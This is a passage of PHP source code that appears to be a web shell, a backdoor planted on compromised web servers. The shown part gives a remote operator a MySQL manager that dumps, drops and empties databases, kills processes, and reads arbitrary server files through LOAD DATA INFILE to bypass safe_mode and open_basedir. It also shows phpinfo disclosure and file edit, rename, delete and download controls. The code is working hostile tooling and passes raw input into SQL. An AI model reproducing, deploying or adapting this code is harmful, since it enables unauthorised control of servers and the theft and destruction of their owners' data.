1173echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\">$dbname</a></b></td></table>"; } }
1174 else {
1175echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br>\n";
1176$c = 0;
1177while ($row = mysql_fetch_array($result)) {
1178 $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
1179 $count_row = mysql_fetch_array($count);
1180 echo "\t<b>+ <a style='color:#00ff00;' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
1181 mysql_free_result($count);
1182 $c++;
1183}
1184if (!$c) { echo "No tables found in database"; }
1185 }
1186}
1187echo '</td>';
1188echo '<td style="border:1px solid #333333;">';
1189$diplay = TRUE;
1190if (@$sql_db) {
1191 if (!is_numeric($c)) { $c = 0; }
1192 if ($c == 0) { $c = "no"; }
1193 echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
1194 if (count(@$dbquicklaunch) > 0) {
1195foreach($dbsqlquicklaunch as $item) {
1196 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1197}
1198 }
1199 echo "</b></center>\n";
1200 $xs = array("","dump");
1201 if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1202 elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
1203 elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
1204 elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1205 elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1206 elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1207 elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1208 elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
1209 elseif ($sql_tbl_x == "insert") {
1210if ($sql_tbl_insert_radio == 1) {
1211 $keys = "";
1212 $akeys = array_keys($sql_tbl_insert);
1213 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1214 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1215 $values = "";
1216 $i = 0;
1217 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1218 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1219 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1220 $sql_x = "query";
1221 $sql_tbl_x = "browse";
1222}
1223elseif ($sql_tbl_insert_radio == 2) {
1224 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1225 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1226 $result = mysql_query($sql_query) or print(mysql_smarterror());
1227 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1228 $sql_x = "query";
1229 $sql_tbl_x = "browse";
1230}
1231 }
1232 if ($sql_x == "query") {
1233echo "<hr size=\"1\" noshade>";
1234if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1235if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
1236if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
1237 }
1238 if (in_array($sql_x,$xs)) {
1239echo '<table class="tab">
1240<tr>
1241<td style="border:1px solid #333333;padding:3px;">
1242<b>Create new table:</b>
1243<form action="'.$surl.'">
1244<input type="hidden" name="x" value="sql">
1245<input type="hidden" name="sql_x" value="newtbl">
1246<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1247<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1248<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1249<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1250<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1251<input type="text" name="sql_newtbl" size="20">
1252Fields: <input type="text" name="sql_field" size="3">
1253<input class="inputzbut" type="submit" value="Create">
1254</form>
1255</td>
1256<td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
1257<form action="'.$surl.'">
1258<input type="hidden" name="x" value="sql">
1259<input type="hidden" name="sql_x" value="dump">
1260<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1261<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1262<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1263<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1264<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1265<input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql">
1266<input type="submit" class="inputzbut" name="submit" value="Dump">
1267</form>
1268</td>
1269</tr>
1270</table>';
1271if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
1272if ($sql_x == "newtbl") {
1273 echo "<b>";
1274 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1275echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1276 }
1277 else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
1278}
1279elseif ($sql_x == "dump") {
1280 if (empty($submit)) {
1281$diplay = FALSE;
1282echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1283echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1284$v = join (";",$dmptbls);
1285echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1286if ($dump_file) {$tmp = $dump_file;}
1287else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1288echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1289echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1290echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1291echo "<br><br><input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"Dump\">";
1292echo "</form>";
1293 }
1294 else {
1295$diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0;
1296$set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array();
1297if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1298$ret = mysql_dump($set);
1299if ($sql_dump_download) {
1300 @ob_clean();
1301 header("Content-type: application/octet-stream");
1302 header("Content-length: ".strlen($ret));
1303 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1304 echo $ret;
1305 exit;
1306}
1307elseif ($sql_dump_savetofile) {
1308 $fp = fopen($sql_dump_file,"w");
1309 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1310 else {
1311fwrite($fp,$ret);
1312fclose($fp);
1313echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1314 }
1315}
1316else {echo "<b>Dump: nothing to do!</b>";}
1317 }
1318}
1319if ($diplay) {
1320 if (!empty($sql_tbl)) {
1321 if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
1322 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1323 $count_row = mysql_fetch_array($count);
1324 mysql_free_result($count);
1325 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1326$tbl_struct_fields = array();
1327while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1328 if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
1329 if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
1330 if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
1331 if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
1332 $perpage = $sql_tbl_le - $sql_tbl_ls;
1333 if (!is_numeric($perpage)) { $perpage = 10; }
1334 $numpages = $count_row[0]/$perpage;
1335 $e = explode(" ",$sql_order);
1336 if (count($e) == 2) {
1337if ($e[0] == "d") { $asc_desc = "DESC"; }
1338else { $asc_desc = "ASC"; }
1339$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1340 }
1341 else {$v = "";}
1342 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1343 $result = mysql_query($query) or print(mysql_smarterror());
1344 echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1345 echo "<hr size=\"1\" noshade>";
1346 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> ";
1347 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> ";
1348 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
1349 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[ <b>Insert</b> ]</a> ";
1350 if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
1351 if ($sql_tbl_x == "insert") {
1352if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1353if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
1354else {
1355 echo "<br><br><b>Inserting row into table:</b><br>";
1356 if (!empty($sql_tbl_insert_q)) {
1357$sql_query = "SELECT * FROM `".$sql_tbl."`";
1358$sql_query .= " WHERE".$sql_tbl_insert_q;
1359$sql_query .= " LIMIT 1;";
1360$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1361$values = mysql_fetch_assoc($result);
1362mysql_free_result($result);
1363 }
1364 else {$values = array();}
1365 echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
1366 foreach ($tbl_struct_fields as $field) {
1367$name = $field["Field"];
1368if (empty($sql_tbl_insert_q)) {$v = "";}
1369echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1370$i++;
1371 }
1372 echo "</table><br>";
1373 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1374 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1375 echo "<br><br><input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form>";
1376}
1377 }
1378 if ($sql_tbl_x == "browse") {
1379$sql_tbl_ls = abs($sql_tbl_ls);
1380$sql_tbl_le = abs($sql_tbl_le);
1381echo "<hr size=\"1\" noshade>";
1382echo "<b>Page: </b>";
1383$b = 0;
1384for($i=0;$i<$numpages;$i++) {
1385 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1386 echo $i;
1387 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1388 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1389 else { echo " "; }
1390}
1391if ($i == 0) {echo "empty";}
1392echo "<br><br><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
1393echo "<br><form method=\"POST\">\n";
1394echo "<table class='tub'><tr>";
1395echo "<th><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></th>";
1396for ($i=0;$i<mysql_num_fields($result);$i++) {
1397 $v = mysql_field_name($result,$i);
1398 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1399 else {$s = "a"; $m = "desc";}
1400 echo "<th>";
1401 if (empty($e[0])) {$e[0] = "a";}
1402 if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1403 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
1404 echo "</th>";
1405}
1406echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
1407echo "</tr>";
1408while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1409 echo "<tr>";
1410 $w = "";
1411 $i = 0;
1412 foreach ($row as $k=>$v) {
1413$name = mysql_field_name($result,$i);
1414$w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
1415 }
1416 if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
1417 echo "<td align='center' style='padding:0px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1418 $i = 0;
1419 foreach ($row as $k=>$v) {
1420$v = htmlspecialchars($v);
1421if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
1422echo "<td>".$v."</td>";
1423$i++;
1424 }
1425 echo "<td>";
1426 echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
1427 echo " | ";
1428 echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
1429 echo "</td>";
1430 echo "</tr>";
1431}
1432mysql_free_result($result);
1433echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\"/> <select name=\"sql_x\">";
1434echo "<option value=\"\">With selected:</option>";
1435echo "<option value=\"deleterow\">Delete</option>";
1436echo "</select> <input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form></p>";
1437}
1438 }
1439 else {
1440$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1441if (!$result) { echo mysql_smarterror(); }
1442else {
1443echo '<form method="POST">
1444<table class="tub">
1445<tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
1446 $i = 0;
1447 $tsize = $trows = 0;
1448 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1449$tsize += $row["Data_length"];
1450$trows += $row["Rows"];
1451$size = view_size($row["Data_length"]);
1452echo'<tr>
1453<td align="center" style="padding:0px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'"></td>
1454<td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'"><b>'.$row["Name"].'</b></a></td>
1455<td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
1456<td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a> | <a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a> | <a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
1457</tr>';
1458$i++;
1459 }
1460 echo "\t\t<tr>\n".
1461"\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
1462echo'</tr>
1463</table>
1464<div align="right">
1465<select class="inputz" name="sql_x">
1466<option value="">With selected:</option>
1467<option value="tbldrop">Drop</option>
1468<option value="tblempty">Empty</option>";
1469<option value="tbldump">Dump</option>";
1470<option value="tblcheck">Check table</option>";
1471<option value="tbloptimize">Optimize table</option>";
1472<option value="tblrepair">Repair table</option>";
1473<option value="tblanalyze">Analyze table</option>";
1474</select>
1475<input class="inputzbut" type="submit" value="Confirm">
1476</div>
1477</form>';
1478 mysql_free_result($result);
1479}
1480 }
1481}
1482 }
1483}
1484else {
1485$xs = array("","newdb","serverstatus","servervars","processes","getfile");
1486if (in_array($sql_x,$xs)) {
1487echo '<table class="tab">
1488<tr>
1489<td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
1490<form action="'.$surl.'">
1491<input type="hidden" name="x" value="sql">
1492<input type="hidden" name="sql_x" value="newdb">
1493<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1494<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1495<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1496<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1497<input class="inputz" type="text" name="sql_newdb" size="20">
1498<input class="inputzbut" type="submit" value="Create">
1499</form>
1500</td>
1501<td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
1502<form action="'.$surl.'">
1503<input type="hidden" name="x" value="sql">
1504<input type="hidden" name="sql_x" value="getfile">
1505<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1506<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1507<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1508<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1509<input class="inputz" type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'">
1510<input class="inputzbut" type="submit" value="Get">
1511</form>
1512</td>
1513</tr>
1514</table>';
1515}
1516if (!empty($sql_x)) {
1517 echo "<hr size=\"1\" noshade>";
1518 if ($sql_x == "newdb") {
1519echo "<b>";
1520if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1521else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1522 }
1523 if ($sql_x == "serverstatus") {
1524$result = mysql_query("SHOW STATUS", $sql_sock);
1525echo "<center><b>Server status variables:</b><br><br>";
1526echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1527while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1528echo "</table></center>";
1529mysql_free_result($result);
1530 }
1531 if ($sql_x == "servervars") {
1532$result = mysql_query("SHOW VARIABLES", $sql_sock);
1533echo "<center><b>Server variables:</b><br><br>";
1534echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1535while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1536echo "</table>";
1537mysql_free_result($result);
1538 }
1539 if ($sql_x == "processes") {
1540if (!empty($kill)) {
1541 $query = "KILL ".$kill.";";
1542 $result = mysql_query($query, $sql_sock);
1543 echo "<b>Process #".$kill." was killed.</b>";
1544}
1545$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1546echo "<center><b>Processes:</b><br><br>";
1547echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
1548while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1549echo "</table>";
1550mysql_free_result($result);
1551 }
1552 if ($sql_x == "getfile") {
1553$tmpdb = $sql_login."_tmpdb";
1554$select = mysql_select_db($tmpdb);
1555if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1556if ($select) {
1557 $created = FALSE;
1558 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1559 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1560 $result = mysql_query("SELECT * FROM tmp_file;");
1561 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1562 else {
1563for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1564$f = "";
1565while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1566if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1567else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1568mysql_free_result($result);
1569mysql_query("DROP TABLE tmp_file;");
1570 }
1571}
1572mysql_drop_db($tmpdb);
1573 }
1574}
1575 }
1576}
1577echo '</td></tr>';
1578if ($sql_sock) {
1579 $affected = @mysql_affected_rows($sql_sock);
1580 if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1581 echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1582}
1583echo '</table></center>';
1584 }
1585echo '</form>';
1586}
1587}
1588//*--------------------------------[ batas ]--------------------------------*//
1589
1590
1591elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ini_set('output_buffering',0);
1592 @ob_start();
1593 @eval("phpinfo();");
1594 $buff = @ob_get_contents();
1595 @ob_end_clean();
1596 $awal = strpos($buff,"<body>")+6;
1597 $akhir = strpos($buff,"</body>");
1598 echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1599}
1600elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1601 if(is_file($_GET['view'])){
1602 if(!isset($file)) $file = magicboom($_GET['view']);
1603 if(!$win && $posix){
1604 $name=@posix_getpwuid(@fileowner($folder));
1605 $group=@posix_getgrgid(@filegroup($folder));
1606 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1607 }
1608 else {
1609 $owner = $user;
1610 }
1611 $filn = basename($file);
1612 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1613 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1614 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1615 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1616 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1617 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
1618 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1619 </form>
1620 </td></tr>
1621 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1622 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1623 <tr><td>Owner</td><td>".$owner."</td></tr>
1624 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1625 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1626 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1627 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?y=$pwd&delete=$file\">Delete</a> | <a href=\"?y=$pwd&dl=$file\">Download</a> (<a href=\"?y=$pwd&dlgzip=$file\">GZip</a>)</td></tr>
